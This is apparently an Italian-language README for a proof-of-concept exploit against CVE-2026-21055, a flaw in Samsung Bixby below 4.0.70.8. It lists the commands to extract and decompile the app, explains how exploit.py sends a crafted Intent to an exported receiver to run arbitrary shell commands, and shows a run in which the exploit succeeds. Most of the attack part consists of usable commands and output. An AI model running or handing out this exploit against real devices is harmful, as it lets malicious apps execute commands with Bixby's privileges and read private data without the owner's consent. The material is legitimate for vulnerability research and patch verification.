
Proof-of-concept exploit per CVE-2026-21055 che dimostra l'esecuzione arbitraria di comandi tramite componenti Android esportati in modo improprio in Samsung Bixby. Include analisi dei componenti e script di attacco basati su Intent.
Proof of Concept per CVE-2026-21055: L'esportazione impropria di componenti dell'applicazione Android in Samsung Bixby precedente alla versione 4.0.70.8 consente ad attaccanti locali di eseguire comandi arbitrari con i privilegi di Bixby.
Questo repository contiene due script Python:
analyze_components.py — Analizza un AndroidManifest.xml decompilato per elencare attività, servizi, ricevitori e provider esportati. Segnala i componenti esportati senza guardie di autorizzazione.
exploit.py — Dimostra l'attacco basato su Intent inviando un Intent broadcast manipolato al ricevitore di comandi esportato di Bixby tramite adb shell am, eseguendo un comando con i privilegi di sistema di Bixby.
| Campo | Valore |
|---|---|
| CVE ID | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — Alta |
| CWE | CWE-926 — Esportazione Impropria dei Componenti dell'Applicazione Android |
| App interessata | Samsung Bixby (com.samsung.android.bixby.agent) |
| Versioni interessate | < 4.0.70.8 |
| Versione corretta | 4.0.70.8 |
| Vettore d'attacco | Locale (app dannosa sullo stesso dispositivo) |
| Privilegi richiesti | Nessuno |
| Interazione utente | Nessuna |
| Impatto | Esecuzione arbitraria di comandi con privilegi Bixby |
Estrai l'APK di Bixby dal dispositivo e decompilalo:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
Esegui lo script di analisi:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
Oppure lascia che lo script decompili automaticamente:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
Esportazione dei Componenti: Bixby esporta uno o più componenti (servizi/ricevitori) che gestiscono l'esecuzione di comandi o trigger di automazione. Questi componenti sono esportati con android:exported="true" ma senza un attributo android:permission o controlli di autorizzazione a runtime.
Invio dell'Intent: Qualsiasi app sul dispositivo può inviare un Intent a questi componenti esportati. L'Intent trasporta una stringa di azione (es., ACTION_RUN_SHELL) e extra stringa contenenti il comando da eseguire e un percorso del file di output.
Esecuzione del Comando: Il componente esportato di Bixby riceve l'Intent, estrae il comando e lo esegue tramite Runtime.exec() o un meccanismo simile. Il comando viene eseguito nel contesto del processo di Bixby, ereditando tutti i permessi di sistema di Bixby.
Nessuna Interazione Utente: L'exploit non richiede interazione utente. L'app dannosa invia l'Intent silenziosamente in background.
Questo PoC è fornito solo a scopo educativo e di ricerca sulla sicurezza. Testare solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione. Non utilizzare questo exploit contro dispositivi senza il consenso del proprietario.